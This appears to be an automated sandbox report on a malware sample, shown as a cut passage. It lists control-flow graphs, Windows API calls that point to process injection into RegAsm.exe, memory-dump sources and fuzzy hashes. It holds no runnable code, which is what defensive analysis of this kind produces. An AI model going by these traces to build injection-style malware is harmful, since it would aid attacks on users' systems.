                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 249 32005f4-3201c44 252 3201c46-3201c58 249->252 253 3201c5b-3201ca1 Wow64SetThreadContext 249->253 252->253 254 3201ca3-3201ca9 253->254 255 3201caa-3201cee 253->255 254->255
                                                                                                                          APIs
                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 03201C91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1421464479.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_3200000_temp_u8gpg.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 983334009-0
                                                                                                                          • Opcode ID: cb858f78bdb3a34a2a5b559a62c1e506fe78cec9b4d8549c90f18f8c5cc4641d
                                                                                                                          • Instruction ID: b32b4c381723cbc14fb69f18a15f2736253476ceee30d08819dc95732aa4d526
                                                                                                                          • Opcode Fuzzy Hash: cb858f78bdb3a34a2a5b559a62c1e506fe78cec9b4d8549c90f18f8c5cc4641d
                                                                                                                          • Instruction Fuzzy Hash: 8941AAB4D142589FCB10CFAAD985AEEFBF0BB09310F14802AE419B7251D374A949CF65

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 269 3201bd9-3201c44 271 3201c46-3201c58 269->271 272 3201c5b-3201ca1 Wow64SetThreadContext 269->272 271->272 273 3201ca3-3201ca9 272->273 274 3201caa-3201cee 272->274 273->274
                                                                                                                          APIs
                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 03201C91
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1421464479.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_3200000_temp_u8gpg.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 983334009-0
                                                                                                                          • Opcode ID: 3ab9ec5642cf405b663a8d98e4376ed991c1a8783f70ab3d43a263bf5f66e755
                                                                                                                          • Instruction ID: 451d32f62de67d65d987b6a1343270eb21e262fbafd9c8841748e15e69849366
                                                                                                                          • Opcode Fuzzy Hash: 3ab9ec5642cf405b663a8d98e4376ed991c1a8783f70ab3d43a263bf5f66e755
                                                                                                                          • Instruction Fuzzy Hash: 1F41A9B4D00258DFCB10CFAAD984AEEFBF1BB49310F14802AE419B7251D378A949CF65

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 278 320067c-3202705 ResumeThread 282 3202707-320270d 278->282 283 320270e-3202748 278->283 282->283
                                                                                                                          APIs
                                                                                                                          • ResumeThread.KERNELBASE(00000000), ref: 032026F5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1421464479.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_3200000_temp_u8gpg.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ResumeThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 947044025-0
                                                                                                                          • Opcode ID: 908e40e34235ae1aece1553ebd3761b73456c9fb38cb6510dcfc8baa860c80a0
                                                                                                                          • Instruction ID: b60a1a36e609500172ef432c67458e390b40c0b8cc39e94bc31b5c80a962f960
                                                                                                                          • Opcode Fuzzy Hash: 908e40e34235ae1aece1553ebd3761b73456c9fb38cb6510dcfc8baa860c80a0
                                                                                                                          • Instruction Fuzzy Hash: 0B31C9B8D11218DFCB10CFA9E584A9EFBF4BB09310F10942AE818B3350D775A845CFA4
                                                                                                                          APIs
                                                                                                                          • ResumeThread.KERNELBASE(00000000), ref: 032026F5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1421464479.0000000003200000.00000040.00000800.00020000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_3200000_temp_u8gpg.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ResumeThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 947044025-0
                                                                                                                          • Opcode ID: 4c999d47f337b0f86712e9bc92a688afeef67200947d9f817fa5a02565d02357
                                                                                                                          • Instruction ID: d22ddc0f73a8f196976581ed6088a9ea9aaf20830b6dd1beafd2da7cd00a6cb6
                                                                                                                          • Opcode Fuzzy Hash: 4c999d47f337b0f86712e9bc92a688afeef67200947d9f817fa5a02565d02357
                                                                                                                          • Instruction Fuzzy Hash: 7B31A8B8D11258DFCB10CFA9E984A9EFBF4BB09310F14942AE818B7350D375A945CFA4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1421009743.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2e7d000_temp_u8gpg.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e46742cc6a5f765f8ec5f0af310dbaf1639e9a6edb63334c8050e19d6c40616f
                                                                                                                          • Instruction ID: 69cc3d2323e34e6ed00e52fe4b620fc9b434c11a023368655579e0c57803c99d
                                                                                                                          • Opcode Fuzzy Hash: e46742cc6a5f765f8ec5f0af310dbaf1639e9a6edb63334c8050e19d6c40616f
                                                                                                                          • Instruction Fuzzy Hash: B2212871544204DFDB09DF14DDC0B16BF65FF88324F20C179E9094B25AD336E456C6A1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.1421009743.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_2e7d000_temp_u8gpg.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                                                                                          • Instruction ID: 9ac89adec409d870638c1813a107c4d6dc5d6277792ee5554193f8f37fba67a7
                                                                                                                          • Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
                                                                                                                          • Instruction Fuzzy Hash: A8110372444240DFCB16CF00D9C4B16BF71FF84328F24C2A9D8090B256C33AE45ACBA1

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:1.4%
                                                                                                                          Dynamic/Decrypted Code Coverage:4.9%
                                                                                                                          Signature Coverage:12.7%
                                                                                                                          Total number of Nodes:142
                                                                                                                          Total number of Limit Nodes:12
                                                                                                                          execution_graph 79328 42c443 79329 42c460 79328->79329 79332 2f22df0 LdrInitializeThunk 79329->79332 79330 42c488 79332->79330 79333 42ff83 79334 42ff93 79333->79334 79335 42ff99 79333->79335 79338 42efc3 79335->79338 79337 42ffbf 79341 42d153 79338->79341 79340 42efde 79340->79337 79342 42d16d 79341->79342 79343 42d17e RtlAllocateHeap 79342->79343 79343->79340 79471 4250e3 79472 4250ff 79471->79472 79473 425127 79472->79473 79474 42513b 79472->79474 79476 42ce33 NtClose 79473->79476 79475 42ce33 NtClose 79474->79475 79477 425144 79475->79477 79478 425130 79476->79478 79481 42f003 RtlAllocateHeap 79477->79481 79480 42514f 79481->79480 79482 42ffe3 79483 42eee3 RtlFreeHeap 79482->79483 79484 42fff8 79483->79484 79485 425473 79489 42548c 79485->79489 79486 4254d4 79487 42eee3 RtlFreeHeap 79486->79487 79488 4254e4 79487->79488 79489->79486 79490 425517 79489->79490 79492 42551c 79489->79492 79491 42eee3 RtlFreeHeap 79490->79491 79491->79492 79344 414243 79347 42d0b3 79344->79347 79348 42d0d0 79347->79348 79351 2f22c70 LdrInitializeThunk 79348->79351 79349 414265 79351->79349 79444 41ad13 79445 41ad85 79444->79445 79446 41ad2b 79444->79446 79446->79445 79448 41ec33 79446->79448 79450 41ec59 79448->79450 79449 41ed56 79449->79445 79450->79449 79457 430023 RtlAllocateHeap RtlFreeHeap 79450->79457 79452 41eceb 79452->79449 79453 41ed4d 79452->79453 79454 42c493 LdrInitializeThunk 79452->79454 79453->79449 79458 4290c3 79453->79458 79454->79453 79456 41ee0e 79456->79445 79457->79452 79460 429128 79458->79460 79459 429163 79459->79456 79460->79459 79463 419313 79460->79463 79462 429145 79462->79456 79464 4192b3 79463->79464 79465 42d1f3 ExitProcess 79464->79465 79466 4192fb 79465->79466 79466->79462 79467 2f22b60 LdrInitializeThunk 79493 41ba73 79494 41bab7 79493->79494 79495 41bad8 79494->79495 79496 42ce33 NtClose 79494->79496 79496->79495 79497 4147b3 79498 4147cd 79497->79498 79503 417f53 79498->79503 79500 4147eb 79501 414830 79500->79501 79502 41481f PostThreadMessageW 79500->79502 79502->79501 79504 417f5f 79503->79504 79505 417fb3 LdrLoadDll 79504->79505 79506 417f7e 79504->79506 79505->79506 79506->79500 79352 401bc9 79353 401bd0 79352->79353 79356 430453 79353->79356 79359 42eab3 79356->79359 79360 42ead6 79359->79360 79371 407593 79360->79371 79362 42eaec 79370 401c1c 79362->79370 79374 41b883 79362->79374 79364 42eb0b 79367 42eb20 79364->79367 79389 42d1f3 79364->79389 79385 4289d3 79367->79385 79368 42eb3a 79369 42d1f3 ExitProcess 79368->79369 79369->79370 79373 4075a0 79371->79373 79392 416c03 79371->79392 79373->79362 79375 41b8af 79374->79375 79416 41b773 79375->79416 79378 41b8f4 79381 41b910 79378->79381 79383 42ce33 NtClose 79378->79383 79379 41b8dc 79380 41b8e7 79379->79380 79422 42ce33 79379->79422 79380->79364 79381->79364 79384 41b906 79383->79384 79384->79364 79386 428a35 79385->79386 79387 428a42 79386->79387 79430 418dc3 79386->79430 79387->79368 79390 42d210 79389->79390 79391 42d221 ExitProcess 79390->79391 79391->79367 79393 416c20 79392->79393 79395 416c39 79393->79395 79396 42d883 79393->79396 79395->79373 79397 42d89d 79396->79397 79398 42d8cc 79397->79398 79403 42c493 79397->79403 79398->79395 79404 42c4ad 79403->79404 79410 2f22c0a 79404->79410 79405 42c4d9 79407 42eee3 79405->79407 79413 42d1a3 79407->79413 79409 42d945 79409->79395 79411 2f22c1f LdrInitializeThunk 79410->79411 79412 2f22c11 79410->79412 79411->79405 79412->79405 79414 42d1bd 79413->79414 79415 42d1ce RtlFreeHeap 79414->79415 79415->79409 79417 41b78d 79416->79417 79421 41b869 79416->79421 79425 42c533 79417->79425 79420 42ce33 NtClose 79420->79421 79421->79378 79421->79379 79423 42ce4d 79422->79423 79424 42ce5e NtClose 79423->79424 79424->79380 79426 42c54d 79425->79426 79429 2f235c0 LdrInitializeThunk 79426->79429 79427 41b85d 79427->79420 79429->79427 79431 418ded 79430->79431 79437 4192fb 79431->79437 79438 414423 79431->79438 79433 418f1a 79434 42eee3 RtlFreeHeap 79433->79434 79433->79437 79435 418f32 79434->79435 79436 42d1f3 ExitProcess 79435->79436 79435->79437 79436->79437 79437->79387 79442 414443 79438->79442 79440 4144ac 79440->79433 79441 4144a2 79441->79433 79442->79440 79443 41bb93 RtlFreeHeap LdrInitializeThunk 79442->79443 79443->79441 79468 419518 79469 42ce33 NtClose 79468->79469 79470 419522 79469->79470

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 43 418dc3-418e37 call 42ef83 * 3 call 404b33 call 424a83 54 419306-41930a 43->54 55 418e3d-418e67 call 42ef33 43->55 58 418e72 55->58 59 418e69-418e70 55->59 60 418e74-418e7e 58->60 59->60 61 418e80 60->61 62 418e9f-418eb1 call 424ab3 60->62 63 418e83-418e86 61->63 69 419304-419305 62->69 70 418eb7-418ecf call 42e903 62->70 65 418e88-418e8b 63->65 66 418e8f-418e99 63->66 65->63 68 418e8d 65->68 66->62 68->62 69->54 70->69 73 418ed5-418f25 call 414423 70->73 73->69 76 418f2b-418f4b call 42eee3 73->76 79 418f4d-418f4f 76->79 80 418f7c-418f7e 76->80 81 418f51-418f5f call 42e473 call 4070e3 79->81 82 418f87-418f9f call 41b923 79->82 80->82 83 418f80 80->83 91 418f64-418f69 81->91 86 418fa4-418fa9 82->86 83->82 86->69 88 418faf-418fdb call 42c663 86->88 88->69 94 418fe1-419058 call 42c003 call 42c0b3 call 42ef33 88->94 91->80 93 418f6b-418f7a 91->93 93->94 101 419061 94->101 102 41905a-41905f 94->102 103 419063-419093 101->103 102->103 104 419175 103->104 105 419099-41909f 103->105 106 419177-41917e 104->106 107 4190a1-4190a4 105->107 108 4190b0-4190d1 call 42ef33 105->108 111 419183-419187 106->111 107->105 109 4190a6-4190ab 107->109 115 4190d3-4190db 108->115 116 4190dd 108->116 109->106 113 419189-41918b 111->113 114 41918d-419191 111->114 113->114 117 419193-4191a7 113->117 114->111 118 4190e0-4190f5 115->118 116->118 119 4191a9-4191af 117->119 120 419218-419268 call 417ed3 * 2 call 42ef03 117->120 121 4190f7 118->121 122 419108-419149 call 417e53 call 42ef33 118->122 124 4191b3-4191b8 119->124 151 41926a-41926e 120->151 152 41928d-419292 120->152 125 4190fa-4190fd 121->125 145 419152 122->145 146 41914b-419150 122->146 128 4191ba-4191bd 124->128 129 4191cf-4191d3 124->129 131 419106 125->131 132 4190ff-419102 125->132 128->129 135 4191bf-4191c1 128->135 129->124 130 4191d5-4191d7 129->130 130->120 137 4191d9-4191e2 130->137 131->122 132->125 138 419104 132->138 135->129 136 4191c3-4191c6 135->136 136->129 143 4191c8 136->143 144 4191e4-4191e7 137->144 138->122 143->129 148 419212-419216 144->148 149 4191e9-4191ec 144->149 150 419154-419173 call 415373 145->150 146->150 148->120 148->144 149->148 153 4191ee-4191f0 149->153 150->106 154 419270-419281 call 407153 151->154 155 41929a-4192ac call 42c213 151->155 152->155 157 419294 152->157 153->148 158 4191f2-4191f5 153->158 163 419286-41928b 154->163 165 4192b3-4192c8 call 41baf3 155->165 157->155 158->148 162 4191f7-419210 158->162 162->148 163->152 163->165 168 4192ca-4192f6 call 417e53 * 2 call 42d1f3 165->168 175 4192fb-4192fe 168->175 175->69
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1574816777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %$%$0=b^
                                                                                                                          • API String ID: 0-2347124769
                                                                                                                          • Opcode ID: 3aad28a46e369d0a40762ecf2d84bf70daaedbaedf3729af0355094cadd0eab5
                                                                                                                          • Instruction ID: 85fe72f4e0f854d2db17b5a9f1e415d5475090badd64a8e269c9c1412523aded
                                                                                                                          • Opcode Fuzzy Hash: 3aad28a46e369d0a40762ecf2d84bf70daaedbaedf3729af0355094cadd0eab5
                                                                                                                          • Instruction Fuzzy Hash: D6F190B1E0021AAFDB24CF94CC85AEEB7B8AF45304F1481AEE519A7341DB745E81CF95

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 176 417f53-417f7c call 42fac3 180 417f82-417f90 call 4300c3 176->180 181 417f7e-417f81 176->181 184 417fa0-417fb1 call 42e583 180->184 185 417f92-417f9d call 430363 180->185 190 417fb3-417fc7 LdrLoadDll 184->190 191 417fca-417fcd 184->191 185->184 190->191
                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417FC5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1574816777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          • Opcode ID: 3fe8b4b3c928643f2372ef665b4a9745e3ad0373b24b018f6ca483aa9f35663e
                                                                                                                          • Instruction ID: a878203bc698d83f05b7e2fca1152cc0e70717ccebf5934bd4b8571c1c78209f
                                                                                                                          • Opcode Fuzzy Hash: 3fe8b4b3c928643f2372ef665b4a9745e3ad0373b24b018f6ca483aa9f35663e
                                                                                                                          • Instruction Fuzzy Hash: 06011EB5E4020DABDF10DBE5DC92FDEB778AB54308F0041AAE90897240F635EB598B95

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 202 42ce33-42ce6c call 4048f3 call 42e073 NtClose
                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CE67
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1574816777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          • Opcode ID: 9a1499e219b01f6c9a04ddb757c9dca137445a984c770f04393579757e662d82
                                                                                                                          • Instruction ID: 12d92c16304b53064a5c4291a4558afdafcc0bd6d98ff4256559b717f45b20f5
                                                                                                                          • Opcode Fuzzy Hash: 9a1499e219b01f6c9a04ddb757c9dca137445a984c770f04393579757e662d82
                                                                                                                          • Instruction Fuzzy Hash: C7E04F762506147BD510BA5ADC11F97775CDFC5714F004469FB0867142C675790186F4

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 219 2f235c0-2f235cc LdrInitializeThunk
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 9e30420beb9f18c54897c770759fba3fdfb4c0c626f928a9f8973542af84d3ba
                                                                                                                          • Instruction ID: e53da5599f4230300eccf9776f5ce2900c85a369f93628fa2ab75946e6a720bf
                                                                                                                          • Opcode Fuzzy Hash: 9e30420beb9f18c54897c770759fba3fdfb4c0c626f928a9f8973542af84d3ba
                                                                                                                          • Instruction Fuzzy Hash: 0890023160550412D50171588514707201587D0281F65C411F1428568D87998A5175A2

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 216 2f22b60-2f22b6c LdrInitializeThunk
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 65c807b62a5adee7f03a9dde5319d5354b6124829cedb49d046b9732de5b71b7
                                                                                                                          • Instruction ID: fa47a533947210286c8ed95bb6c40be7f35519c62372bd037548cbdd39cca470
                                                                                                                          • Opcode Fuzzy Hash: 65c807b62a5adee7f03a9dde5319d5354b6124829cedb49d046b9732de5b71b7
                                                                                                                          • Instruction Fuzzy Hash: 0190026120240013450671588414617501A87E0281B55C021F2018590DC52989917125

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 217 2f22c70-2f22c7c LdrInitializeThunk
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: aa5ef7f7424a950197c122b0f84b64397dd3d0438c1c26ae61ac4c9d8b434285
                                                                                                                          • Instruction ID: 460fc680e8afb8b635ca1e9cc65e5f5d97263a9263178c19d89f58f23e5a9a91
                                                                                                                          • Opcode Fuzzy Hash: aa5ef7f7424a950197c122b0f84b64397dd3d0438c1c26ae61ac4c9d8b434285
                                                                                                                          • Instruction Fuzzy Hash: 1090023120148812D5117158C40474B101587D0381F59C411F5428658D869989917121

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 218 2f22df0-2f22dfc LdrInitializeThunk
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1575193148.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_2eb0000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: a5f96caf69554fcffd7a49a10a78090d77f800526f954e3c23aaa63a303e30c7
                                                                                                                          • Instruction ID: 01a152c9f424cf4d30e31a4e8050964691c04adce34536af8da5e58e48647d2c
                                                                                                                          • Opcode Fuzzy Hash: a5f96caf69554fcffd7a49a10a78090d77f800526f954e3c23aaa63a303e30c7
                                                                                                                          • Instruction Fuzzy Hash: AC90023120140423D51271588504707101987D02C1F95C412F1428558D965A8A52B121

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • PostThreadMessageW.USER32(74w51-39,00000111,00000000,00000000), ref: 0041482A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1574816777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostThread
                                                                                                                          • String ID: 74w51-39$74w51-39
                                                                                                                          • API String ID: 1836367815-2653036387
                                                                                                                          • Opcode ID: 4bb8949d7952fd6f5e8e45d4105f9153af2bca4304bc491e0bd1dbb5af135acc
                                                                                                                          • Instruction ID: 08783e45b3445f12ea0d109643d2fe1f3c0a7b118079be54961ebfd15e186d8f
                                                                                                                          • Opcode Fuzzy Hash: 4bb8949d7952fd6f5e8e45d4105f9153af2bca4304bc491e0bd1dbb5af135acc
                                                                                                                          • Instruction Fuzzy Hash: BA01E1B2D4115C7ADB00AAD58C81DFF7B7CDF41398F81806AFA14AB141D22C8E078BA5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 15 4147ad-4147c5 16 4147cd-41481d call 42f993 call 417f53 call 404863 call 4255b3 15->16 17 4147c8 call 42ef83 15->17 26 41483d-414843 16->26 27 41481f-41482e PostThreadMessageW 16->27 17->16 27->26 28 414830-41483a 27->28 28->26
                                                                                                                          APIs
                                                                                                                          • PostThreadMessageW.USER32(74w51-39,00000111,00000000,00000000), ref: 0041482A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1574816777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostThread
                                                                                                                          • String ID: 74w51-39$74w51-39
                                                                                                                          • API String ID: 1836367815-2653036387
                                                                                                                          • Opcode ID: a8befdf1139e21b3882535c43dbf738675fb9d190012064125ebd954cb9cfc20
                                                                                                                          • Instruction ID: 55e4c84b5d1332bfae79c458348879d2d4c42dde8b1271e511681eabfa8b2cfc
                                                                                                                          • Opcode Fuzzy Hash: a8befdf1139e21b3882535c43dbf738675fb9d190012064125ebd954cb9cfc20
                                                                                                                          • Instruction Fuzzy Hash: 0001E5B2E0115C7ADB10AAE19C81DEF7B7CDF41398F408069FA14BB241D6384E068BA4

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 29 4147b3-4147c5 30 4147cd-41481d call 42f993 call 417f53 call 404863 call 4255b3 29->30 31 4147c8 call 42ef83 29->31 40 41483d-414843 30->40 41 41481f-41482e PostThreadMessageW 30->41 31->30 41->40 42 414830-41483a 41->42 42->40
                                                                                                                          APIs
                                                                                                                          • PostThreadMessageW.USER32(74w51-39,00000111,00000000,00000000), ref: 0041482A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1574816777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostThread
                                                                                                                          • String ID: 74w51-39$74w51-39
                                                                                                                          • API String ID: 1836367815-2653036387
                                                                                                                          • Opcode ID: d8c847d9b602cc0ef889ac12f254f5617776066c6cf961dec30326a9506bf840
                                                                                                                          • Instruction ID: 1d3746b8afa38300bee756f3e677ba9afac3934325a235b4f4357ff197b049ae
                                                                                                                          • Opcode Fuzzy Hash: d8c847d9b602cc0ef889ac12f254f5617776066c6cf961dec30326a9506bf840
                                                                                                                          • Instruction Fuzzy Hash: DB0104B2D0015C7ADB00AAE18C81DEF7B7CDF40398F408069FA0477240D6388E068BB5

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 192 42d153-42d194 call 4048f3 call 42e073 RtlAllocateHeap
                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(?,0041ECEB,?,?,00000000,?,0041ECEB,?,?,?), ref: 0042D18F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1574816777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: 410d0e9143d4020b8a6aae258be14db686c65e6f57224d5bd35b00bbd2e1ea86
                                                                                                                          • Instruction ID: 79292d26c6a9dc3b6d4b7b5f52fefd6cb1c5ad5164505cdca91e487aa7c787f8
                                                                                                                          • Opcode Fuzzy Hash: 410d0e9143d4020b8a6aae258be14db686c65e6f57224d5bd35b00bbd2e1ea86
                                                                                                                          • Instruction Fuzzy Hash: 31E092B22002147BD610EE9AEC41F9B37ACEFC4710F008419FA08A7241D675B91087B8

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 197 42d1a3-42d1e4 call 4048f3 call 42e073 RtlFreeHeap
                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8B5A8279,00000007,00000000,00000004,00000000,004177C9,000000F4), ref: 0042D1DF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1574816777.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3298025750-0
                                                                                                                          • Opcode ID: bf9b3b606b360d8ef7542bf77a1065b0c88594b9b14cd1931fab7db17ec5ce49
                                                                                                                          • Instruction ID: e239419f071058c402d1cca2ecf357ad84d18736701478b7885498ac9f6fd536
                                                                                                                          • Opcode Fuzzy Hash: bf9b3b606b360d8ef7542bf77a1065b0c88594b9b14cd1931fab7db17ec5ce49
